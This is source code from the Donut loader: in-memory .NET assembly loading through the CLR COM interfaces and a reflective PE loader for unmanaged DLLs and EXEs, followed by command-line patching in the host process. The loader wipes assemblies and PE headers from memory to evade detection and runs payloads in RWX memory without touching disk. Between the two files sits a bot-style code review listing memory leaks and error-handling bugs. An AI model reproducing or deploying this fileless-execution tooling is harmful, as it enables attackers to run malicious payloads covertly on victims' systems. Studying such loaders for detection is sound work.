92 DPRINT("ICorRuntimeHost::Start");
93
94 hr = pa->icrh->lpVtbl->Start(pa->icrh);
95
96 if(SUCCEEDED(hr)) {
97 DPRINT("Domain is %s", mod->domain);
98 ansi2unicode(inst, mod->domain, buf);
99 domain = inst->api.SysAllocString(buf);
100
101 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", buf);
102
103 hr = pa->icrh->lpVtbl->CreateDomain(
104 pa->icrh, domain, NULL, &pa->iu);
105
106 inst->api.SysFreeString(domain);
107
108 if(SUCCEEDED(hr)) {
109 DPRINT("IUnknown::QueryInterface");
110
111 hr = pa->iu->lpVtbl->QueryInterface(
112 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
113
114 if(SUCCEEDED(hr)) {
115 sab.lLbound = 0;
116 sab.cElements = mod->len;
117 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
118
119 if(sa != NULL) {
120 DPRINT("Copying %" PRIi32 " bytes of assembly to safe array", mod->len);
121
122 for(i=0, p=sa->pvData; i<mod->len; i++) {
123 p[i] = mod->data[i];
124 }
125
126 DPRINT("AppDomain::Load_3");
127
128 hr = pa->ad->lpVtbl->Load_3(
129 pa->ad, sa, &pa->as);
130
131 loaded = hr == S_OK;
132
133 DPRINT("HRESULT : %08lx", hr);
134
135 DPRINT("Erasing assembly from memory");
136
137 for(i=0, p=sa->pvData; i<mod->len; i++) {
138 p[i] = mod->data[i] = 0;
139 }
140
141 DPRINT("SafeArrayDestroy");
142 inst->api.SafeArrayDestroy(sa);
143 }
144 }
145 }
146 }
147 return loaded;
148 }
149
150 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
151 SAFEARRAY *sav=NULL, *args=NULL;
152 VARIANT arg, ret, vtPsa, v1={0}, v2;
153 DWORD i;
154 HRESULT hr;
155 BSTR cls, method;
156 ULONG cnt;
157 OLECHAR str[1]={0};
158 LONG ucnt, lcnt;
159 WCHAR **argv, buf[DONUT_MAX_NAME+1];
160 int argc;
161
162 DPRINT("Type is %s",
163 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
164
165 // if this is a program
166 if(mod->type == DONUT_MODULE_NET_EXE) {
167 // get the entrypoint
168 DPRINT("MethodInfo::EntryPoint");
169 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
170
171 if(SUCCEEDED(hr)) {
172 // get the parameters for entrypoint
173 DPRINT("MethodInfo::GetParameters");
174 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &args);
175
176 if(SUCCEEDED(hr)) {
177 DPRINT("SafeArrayGetLBound");
178 hr = inst->api.SafeArrayGetLBound(args, 1, &lcnt);
179
180 DPRINT("SafeArrayGetUBound");
181 hr = inst->api.SafeArrayGetUBound(args, 1, &ucnt);
182 cnt = ucnt - lcnt + 1;
183 DPRINT("Number of parameters for entrypoint : %i", cnt);
184
185 // does Main require string[] args?
186 if(cnt != 0) {
187 // create a 1 dimensional array for Main parameters
188 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
189 // if user specified their own parameters, add to string array
190 if(mod->param[0] != 0) {
191 ansi2unicode(inst, mod->param, buf);
192 argv = inst->api.CommandLineToArgvW(buf, &argc);
193 // create 1 dimensional array for strings[] args
194 vtPsa.vt = (VT_ARRAY | VT_BSTR);
195 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, argc);
196
197 // add each string parameter
198 for(i=0; i<argc; i++) {
199 DPRINT("Adding \"%ws\" as parameter %i", argv[i], (i + 1));
200 inst->api.SafeArrayPutElement(vtPsa.parray,
201 &i, inst->api.SysAllocString(argv[i]));
202 }
203 } else {
204 DPRINT("Adding empty string for invoke_3");
205 // add empty string to make it work
206 // create 1 dimensional array for strings[] args
207 vtPsa.vt = (VT_ARRAY | VT_BSTR);
208 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
209
210 i=0;
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(str));
213 }
214 // add string array to list of parameters
215 i=0;
216 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
217 }
218 v1.vt = VT_NULL;
219 v1.plVal = NULL;
220
221 DPRINT("MethodInfo::Invoke_3()\n");
222
223 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
224
225 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
226 hr, SUCCEEDED(hr) ? "Success" : "Failed");
227
228 if(sav != NULL) {
229 inst->api.SafeArrayDestroy(vtPsa.parray);
230 inst->api.SafeArrayDestroy(sav);
231 }
232 }
233 } else pa->mi = NULL;
234 } else {
235 ansi2unicode(inst, mod->cls, buf);
236 cls = inst->api.SysAllocString(buf);
237 if(cls == NULL) return FALSE;
238 DPRINT("Class: SysAllocString(\"%ws\")", buf);
239
240 ansi2unicode(inst, mod->method, buf);
241 method = inst->api.SysAllocString(buf);
242 DPRINT("Method: SysAllocString(\"%ws\")", buf);
243
244 if(method != NULL) {
245 DPRINT("Assembly::GetType_2");
246 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
247
248 if(SUCCEEDED(hr)) {
249 sav = NULL;
250 DPRINT("Parameters: %s", mod->param);
251
252 if(mod->param[0] != 0) {
253 ansi2unicode(inst, mod->param, buf);
254 argv = inst->api.CommandLineToArgvW(buf, &argc);
255 DPRINT("SafeArrayCreateVector(%li argument(s))", argc);
256
257 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, argc);
258
259 if(sav != NULL) {
260 for(i=0; i<argc; i++) {
261 DPRINT("Adding \"%ws\" as argument %i", argv[i], (i+1));
262
263 V_BSTR(&arg) = inst->api.SysAllocString(argv[i]);
264 V_VT(&arg) = VT_BSTR;
265
266 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
267
268 if(FAILED(hr)) {
269 DPRINT("SafeArrayPutElement failed.");
270 inst->api.SafeArrayDestroy(sav);
271 sav = NULL;
272 }
273 }
274 }
275 }
276 if(SUCCEEDED(hr)) {
277 DPRINT("Calling Type::InvokeMember_3");
278
279 hr = pa->type->lpVtbl->InvokeMember_3(
280 pa->type,
281 method, // name of method
282 BindingFlags_InvokeMethod |
283 BindingFlags_Static |
284 BindingFlags_Public,
285 NULL,
286 v1, // empty VARIANT
287 sav, // arguments to method
288 &ret); // return code from method
289
290 DPRINT("Type::InvokeMember_3 : %08lx : %s",
291 hr, SUCCEEDED(hr) ? "Success" : "Failed");
292
293 if(sav != NULL) {
294 inst->api.SafeArrayDestroy(sav);
295 }
296 }
297 }
298 inst->api.SysFreeString(method);
299 }
300 inst->api.SysFreeString(cls);
301 }
302 return TRUE;
303 }
304
305 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
306
307 if(pa->type != NULL) {
308 DPRINT("Type::Release");
309 pa->type->lpVtbl->Release(pa->type);
310 pa->type = NULL;
311 }
312
313 if(pa->mi != NULL) {
314 DPRINT("MethodInfo::Release");
315 pa->mi->lpVtbl->Release(pa->mi);
316 pa->mi = NULL;
317 }
318
319 if(pa->as != NULL) {
320 DPRINT("Assembly::Release");
321 pa->as->lpVtbl->Release(pa->as);
322 pa->as = NULL;
323 }
324
325 if(pa->ad != NULL) {
326 DPRINT("AppDomain::Release");
327 pa->ad->lpVtbl->Release(pa->ad);
328 pa->ad = NULL;
329 }
330
331 if(pa->iu != NULL) {
332 DPRINT("IUnknown::Release");
333 pa->iu->lpVtbl->Release(pa->iu);
334 pa->iu = NULL;
335 }
336
337 if(pa->icrh != NULL) {
338 DPRINT("ICorRuntimeHost::Stop");
339 pa->icrh->lpVtbl->Stop(pa->icrh);
340
341 DPRINT("ICorRuntimeHost::Release");
342 pa->icrh->lpVtbl->Release(pa->icrh);
343 pa->icrh = NULL;
344 }
345
346 if(pa->icri != NULL) {
347 DPRINT("ICLRRuntimeInfo::Release");
348 pa->icri->lpVtbl->Release(pa->icri);
349 pa->icri = NULL;
350 }
351
352 if(pa->icmh != NULL) {
353 DPRINT("ICLRMetaHost::Release");
354 pa->icmh->lpVtbl->Release(pa->icmh);
355 pa->icmh = NULL;
356 }
357 }
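Review bot: In `RunAssembly`, the `FAILED(hr)` branch on lines 268–272 destroys `sav` and sets it to `NULL` but does not leave the loop, so the next iteration calls `SafeArrayPutElement(NULL, ...)`; add `break;` after `sav = NULL;` on line 271. The function returns `TRUE` unconditionally on line 302 even when `Invoke_3` (line 223) or `InvokeMember_3` (line 279) reports failure, so callers cannot tell whether the method ever ran; initialising `hr = S_OK` on line 154 and returning `SUCCEEDED(hr)` (or tracking a local success flag) would reflect the outcome. The `argv` arrays from `CommandLineToArgvW` (lines 192 and 254) are never released with `LocalFree`, and per the `SafeArrayPutElement` contract the BSTRs handed to it on lines 201, 212 and 263 are copied into the array, so the originals leak unless freed with `SysFreeString`; `hr` from `SafeArrayGetLBound` on line 178 is also overwritten before it is examined. `i` is declared `DWORD` while `argc` is `int` and the index parameter of `SafeArrayPutElement` is `LONG *`, so `&i` relies on same-size aliasing rather than the declared type — a `LONG idx` for the array index would remove the cast-free mismatch.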
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(PPEB);
44 typedef VOID (WINAPI *DllParam_t)(PVOID);
45 typedef VOID (WINAPI *DllVoid_t)(VOID);
46
47 // for setting the command line...
48 typedef CHAR** (WINAPI *p_acmdln_t)(VOID);
49 typedef WCHAR** (WINAPI *p_wcmdln_t)(VOID);
50
51 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR NewCommandLine);
52 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name);
53
54 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
55 VOID RunPE(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
56 PIMAGE_DOS_HEADER dos, doshost;
57 PIMAGE_NT_HEADERS nt, nthost;
58 PIMAGE_SECTION_HEADER sh;
59 PIMAGE_THUNK_DATA oft, ft;
60 PIMAGE_IMPORT_BY_NAME ibn;
61 PIMAGE_IMPORT_DESCRIPTOR imp;
62 PIMAGE_DELAYLOAD_DESCRIPTOR del;
63 PIMAGE_EXPORT_DIRECTORY exp;
64 PIMAGE_TLS_DIRECTORY tls;
65 PIMAGE_TLS_CALLBACK *callbacks;
66 PIMAGE_RELOC list;
67 PIMAGE_BASE_RELOCATION ibr;
68 DWORD rva;
69 PDWORD adr;
70 PDWORD sym;
71 PWORD ord;
72 PBYTE ofs;
73 PCHAR str, name;
74 HMODULE dll;
75 ULONG_PTR ptr;
76 DllMain_t DllMain; // DLL
77 Start_t Start; // EXE
78 DllParam_t DllParam = NULL; // DLL function accepting one string parameter
79 DllVoid_t DllVoid = NULL; // DLL function that accepts no parametersd
80 LPVOID cs = NULL, base, host;
81 DWORD i, cnt;
82 HANDLE hThread;
83 WCHAR buf[DONUT_MAX_NAME+1];
84 DWORD size_of_img;
85
86 base = mod->data;
87 dos = (PIMAGE_DOS_HEADER)base;
88 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
89
90 // before doing anything. check compatibility between exe/dll and host process.
91 host = inst->api.GetModuleHandle(NULL);
92 doshost = (PIMAGE_DOS_HEADER)host;
93 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
94
95 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
96 DPRINT("Host process %08lx and file %08lx are not compatible...cannot load.",
97 nthost->FileHeader.Machine, nt->FileHeader.Machine);
98 return;
99 }
100
101 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
102 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
103
104 cs = inst->api.VirtualAlloc(
105 NULL, nt->OptionalHeader.SizeOfImage + 4096,
106 MEM_COMMIT | MEM_RESERVE,
107 PAGE_EXECUTE_READWRITE);
108
109 if(cs == NULL) return;
110
111 DPRINT("Copying Headers");
112 Memcpy(cs, base, nt->OptionalHeader.SizeOfHeaders);
113
114 DPRINT("Copying each section to RWX memory %p", cs);
115 sh = IMAGE_FIRST_SECTION(nt);
116
117 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
118 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
119 (PBYTE)base + sh[i].PointerToRawData,
120 sh[i].SizeOfRawData);
121 }
122
123 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
124
125 if(rva != 0) {
126 DPRINT("Applying Relocations");
127
128 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
129 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
130
131 while(ibr->VirtualAddress != 0) {
132 list = (PIMAGE_RELOC)(ibr + 1);
133
134 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
135 if(list->type == IMAGE_REL_TYPE) {
136 *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
137 } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
138 DPRINT("ERROR: Unrecognized Relocation type %08lx.", list->type);
139 goto pe_cleanup;
140 }
141 list++;
142 }
143 ibr = (PIMAGE_BASE_RELOCATION)list;
144 }
145 }
146
147 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
148
149 if(rva != 0) {
150 DPRINT("Processing the Import Table");
151
152 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
153
154 // For each DLL
155 for (;imp->Name!=0; imp++) {
156 name = RVA2VA(PCHAR, cs, imp->Name);
157
158 DPRINT("Loading %s", name);
159 dll = inst->api.LoadLibraryA(name);
160
161 // Resolve the API for this library
162 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
163 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
164
165 // For each API
166 for (;; oft++, ft++) {
167 // No API left?
168 if (oft->u1.AddressOfData == 0) break;
169
170 // Resolve by ordinal?
171 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
172 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
173 } else {
174 // Resolve by name
175 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
176
177 // run entrypoint as thread?
178 if(mod->thread != 0) {
179 // if this is an exit-related API, replace it with RtlExitUserThread
180 if(IsExitAPI(inst, ibn->Name)) {
181 DPRINT("Replacing %s!%s with ntdll!RtlExitUserThread", name, ibn->Name);
182 ft->u1.Function = (ULONG_PTR)inst->api.RtlExitUserThread;
183 continue;
184 }
185 }
186 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
187 }
188 }
189 }
190 }
191
192 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress;
193
194 if(rva != 0) {
195 DPRINT("Processing Delayed Import Table");
196
197 del = RVA2VA(PIMAGE_DELAYLOAD_DESCRIPTOR, cs, rva);
198
199 // For each DLL
200 for (;del->DllNameRVA != 0; del++) {
201 name = RVA2VA(PCHAR, cs, del->DllNameRVA);
202
203 DPRINT("Loading %s", name);
204 dll = inst->api.LoadLibraryA(name);
205
206 if(dll == NULL) continue;
207
208 // Resolve the API for this library
209 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportNameTableRVA);
210 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportAddressTableRVA);
211
212 // For each API
213 for (;; oft++, ft++) {
214 // No API left?
215 if (oft->u1.AddressOfData == 0) break;
216
217 // Resolve by ordinal?
218 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
219 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
220 } else {
221 // Resolve by name
222 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
223 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
224 }
225 }
226 }
227 }
228
229 /**
230 Execute TLS callbacks. These are only called when the process starts, not when a thread begins, ends
231 or when the process ends. TLS is not fully supported.
232 */
233 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress;
234 if(rva != 0) {
235 DPRINT("Processing TLS directory");
236
237 tls = RVA2VA(PIMAGE_TLS_DIRECTORY, cs, rva);
238
239 // address of callbacks is absolute. requires relocation information
240 callbacks = (PIMAGE_TLS_CALLBACK*)tls->AddressOfCallBacks;
241 DPRINT("AddressOfCallBacks : %p", callbacks);
242
243 // DebugBreak();
244
245 if(callbacks) {
246 while(*callbacks != NULL) {
247 // call function
248 DPRINT("Calling %p", *callbacks);
249 (*callbacks)((LPVOID)cs, DLL_PROCESS_ATTACH, NULL);
250 callbacks++;
251 }
252 }
253 }
254
255 size_of_img = nt->OptionalHeader.SizeOfImage;
256 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
257
258 if(mod->type == DONUT_MODULE_DLL) {
259 DPRINT("Executing entrypoint of DLL\n\n");
260 DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
261 DllMain(host, DLL_PROCESS_ATTACH, NULL);
262
263 // call exported api?
264 if(mod->method[0] != 0) {
265 DPRINT("Resolving address of %s", (char*)mod->method);
266
267 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
268
269 if(rva != 0) {
270 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
271 cnt = exp->NumberOfNames;
272
273 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
274
275 if(cnt != 0) {
276 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
277 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
278 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
279
280 do {
281 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
282 if(!_strcmp(str, mod->method)) {
283 DllParam = RVA2VA(DllParam_t, cs, adr[ord[cnt-1]]);
284 break;
285 }
286 } while (--cnt);
287
288 DPRINT("Wiping Headers from memory");
289 Memset(cs, 0, nt->OptionalHeader.SizeOfHeaders);
290 Memset(base, 0, nt->OptionalHeader.SizeOfHeaders);
291
292 // resolved okay?
293 if(DllParam != NULL) {
294 DPRINT("Invoking %s", mod->method);
295 // pass parameters/command line to function?
296 if(mod->param[0] != 0) {
297 if(mod->unicode) {
298 ansi2unicode(inst, mod->param, buf);
299 }
300 DllParam((mod->unicode) ? (PVOID)buf : (PVOID)mod->param);
301 } else {
302 // execute DLL function with no parameters
303 DllVoid = (DllVoid_t)DllParam;
304 DllVoid();
305 }
306 } else {
307 DPRINT("Unable to resolve API");
308 goto pe_cleanup;
309 }
310 }
311 }
312 }
313 } else {
314
315 // set the command line
316 if(mod->param[0] != 0) {
317 ansi2unicode(inst, mod->param, buf);
318 DPRINT("Setting command line: %ws", buf);
319 SetCommandLineW(inst, buf);
320 }
321
322 DPRINT("Wiping Headers from memory");
323 Memset(cs, 0, nt->OptionalHeader.SizeOfHeaders);
324 Memset(base, 0, nt->OptionalHeader.SizeOfHeaders);
325
326 if(mod->thread != 0) {
327 // Create a new thread for this process.
328 // Since we replaced exit-related API with RtlExitUserThread in IAT, once an exit-related API is called, the
329 // thread will simply terminate and return back here. Of course, this doesn't work
330 // if the exit-related API is resolved dynamically.
331 DPRINT("Creating thread for entrypoint of EXE : %p\n\n", (PVOID)Start);
332 hThread = inst->api.CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Start, NULL, 0, NULL);
333
334 if(hThread != NULL) {
335 // wait for thread to terminate
336 inst->api.WaitForSingleObject(hThread, INFINITE);
337 DPRINT("Process terminated");
338 }
339 } else {
340 // if ExitProces is called, this will terminate the host process.
341 DPRINT("Executing entrypoint");
342 Start(NtCurrentTeb()->ProcessEnvironmentBlock);
343 }
344 }
345 pe_cleanup:
346 // if memory allocated
347 if(cs != NULL) {
348 // release
349 DPRINT("Releasing memory");
350 inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
351 }
352 }
353
354 // check each exit-related api with name provided
355 // return TRUE if found, else FALSE
356 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name) {
357 PCHAR str;
358 CHAR api[128];
359 INT i;
360
361 str = inst->exit_api;
362
363 for(;;) {
364 // store string until null byte or semi-colon encountered
365 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) api[i] = str[i];
366 // nothing stored? end
367 if(i == 0) break;
368 // skip name plus one for separator
369 str += (i + 1);
370 // store null terminator
371 api[i] = '\0';
372 // if equal, return TRUE
373 if(!_strcmp(api, name)) return TRUE;
374 }
375 return FALSE;
376 }
377
378 // returns TRUE if ptr is heap memory
379 BOOL IsHeapPtr(PDONUT_INSTANCE inst, LPVOID ptr) {
380 MEMORY_BASIC_INFORMATION mbi;
381 DWORD res;
382
383 if(ptr == NULL) return FALSE;
384
385 // query the pointer
386 res = inst->api.VirtualQuery(ptr, &mbi, sizeof(mbi));
387 if(res != sizeof(mbi)) return FALSE;
388
389 return ((mbi.State == MEM_COMMIT ) &&
390 (mbi.Type == MEM_PRIVATE ) &&
391 (mbi.Protect == PAGE_READWRITE));
392 }
393
394 // Set the command line for host process.
395 //
396 // This replaces kernelbase!BaseUnicodeCommandLine and kernelbase!BaseAnsiCommandLine
397 // that kernelbase!KernelBaseDllInitialize reads from NtCurrentPeb()->ProcessParameters->CommandLine
398 //
399 // BOOL KernelBaseDllInitialize(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
400 //
401 // Only tested on windows 10, but should work with at least windows 7
402 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR CommandLine) {
403 PIMAGE_DOS_HEADER dos;
404 PIMAGE_NT_HEADERS nt;
405 PIMAGE_SECTION_HEADER sh;
406 DWORD i, cnt;
407 PULONG_PTR ds;
408 HMODULE m;
409 ANSI_STRING ansi;
410 PANSI_STRING mbs;
411 PUNICODE_STRING wcs;
412 PPEB peb;
413 PPEB_LDR_DATA ldr;
414 PLDR_DATA_TABLE_ENTRY dte;
415 PRTL_USER_PROCESS_PARAMETERS upp;
416 BOOL bSet = FALSE;
417 CHAR **argv;
418 WCHAR **wargv;
419 p_acmdln_t p_acmdln;
420 p_wcmdln_t p_wcmdln;
421 CHAR sym[128];
422 PCHAR str;
423 INT fptr, atype;
424 PVOID addr;
425
426 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
427 upp = peb->ProcessParameters;
428
429 DPRINT("Obtaining handle for %s", inst->kernelbase);
430 m = inst->api.GetModuleHandle(inst->kernelbase);
431 dos = (PIMAGE_DOS_HEADER)m;
432 nt = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);
433 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
434 nt->FileHeader.SizeOfOptionalHeader);
435
436 // locate the .data segment, save VA and number of pointers
437 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
438 if(*(PDWORD)sh[i].Name == *(PDWORD)inst->dataname) {
439 ds = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
440 cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
441 break;
442 }
443 }
444
445 DPRINT("Searching %i pointers", cnt);
446
447 // for each pointer
448 for(i=0; i<cnt; i++) {
449 wcs = (PUNICODE_STRING)&ds[i];
450 // skip if buffer doesn't point to heap memory
451 if(!IsHeapPtr(inst, wcs->Buffer)) continue;
452 // skip if not equal
453 if(!inst->api.RtlEqualUnicodeString(&upp->CommandLine, wcs, TRUE)) continue;
454 DPRINT("BaseUnicodeCommandLine at %p : %ws", &ds[i], wcs->Buffer);
455 // convert command line to ansi
456 inst->api.RtlUnicodeStringToAnsiString(&ansi, &upp->CommandLine, TRUE);
457 // overwrite the existing command line for GetCommandLineW
458 inst->api.RtlCreateUnicodeString(wcs, CommandLine);
459 // and the one in PEB (disabled for now as it's not required)
460 //inst->api.RtlCreateUnicodeString(&upp->CommandLine, CommandLine);
461
462 DPRINT("New BaseUnicodeCommandLine at %p : %ws", &ds[i], GetCommandLineW());
463 bSet = TRUE;
464 break;
465 }
466
467 if(!bSet) return FALSE;
468
469 // for each pointer
470 for(i=0; i<cnt; i++) {
471 mbs = (PANSI_STRING)&ds[i];
472 // skip if buffer doesn't point to heap memory
473 if(!IsHeapPtr(inst, mbs->Buffer)) continue;
474 // skip if not equal
475 if(!inst->api.RtlEqualString(&ansi, mbs, TRUE)) continue;
476 // overwrite existing command line for GetCommandLineA
477 inst->api.RtlUnicodeStringToAnsiString(&ansi, wcs, TRUE);
478 Memcpy(&ds[i], &ansi, sizeof(ANSI_STRING));
479 DPRINT("New BaseAnsiCommandLine at %p : %s", &ds[i], GetCommandLineA());
480 break;
481 }
482
483 ldr = (PPEB_LDR_DATA)peb->Ldr;
484
485 // for each DLL loaded
486 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
487 dte->DllBase != NULL;
488 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
489 {
490 // check for exported symbols and patch according to string type
491 str = (PCHAR)inst->cmd_syms;
492
493 for(;;) {
494 // reset flags
495 atype = 1; fptr = 0;
496 // store string until null byte or semi-colon encountered
497 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) {
498 // w indicates unicode type
499 if(str[i] == 'w') atype = 0;
500 // p indicates function pointer
501 if(str[i] == 'p') fptr = 1;
502 // store byte
503 sym[i] = str[i];
504 }
505 // nothing stored? end loop for this DLL
506 if(i == 0) break;
507 // skip name plus one for separator
508 str += (i + 1);
509 // store null terminator
510 sym[i] = '\0';
511 // see if it can be resolved for current module
512 addr = inst->api.GetProcAddress(dte->DllBase, sym);
513 // nothing resolve? get the next symbol from list
514 if(addr == NULL) continue;
515 // is this ansi?
516 if(atype) {
517 argv = (PCHAR*)addr;
518 // pointer?
519 if(fptr != 0) {
520 p_acmdln = (p_acmdln_t)addr;
521 argv = p_acmdln();
522 }
523 // anything to patch?
524 if(argv != NULL && *argv != NULL) {
525 DPRINT("Setting %ws!%s \"%s\" to \"%s\"",
526 dte->BaseDllName.Buffer, sym, *argv, ansi.Buffer);
527 *argv = ansi.Buffer;
528 }
529 } else {
530 wargv = (PWCHAR*)addr;
531 // pointer?
532 if(fptr != 0) {
533 p_wcmdln = (p_wcmdln_t)addr;
534 wargv = p_wcmdln();
535 }
536 // anything to patch?
537 if(wargv != NULL && *wargv != NULL) {
538 DPRINT("Setting %ws!%s \"%ws\" to \"%ws\"",
539 dte->BaseDllName.Buffer, sym, *wargv, wcs->Buffer);
540 *wargv = wcs->Buffer;
541 }
542 }
543 }
544 }
545 return TRUE;
546 }
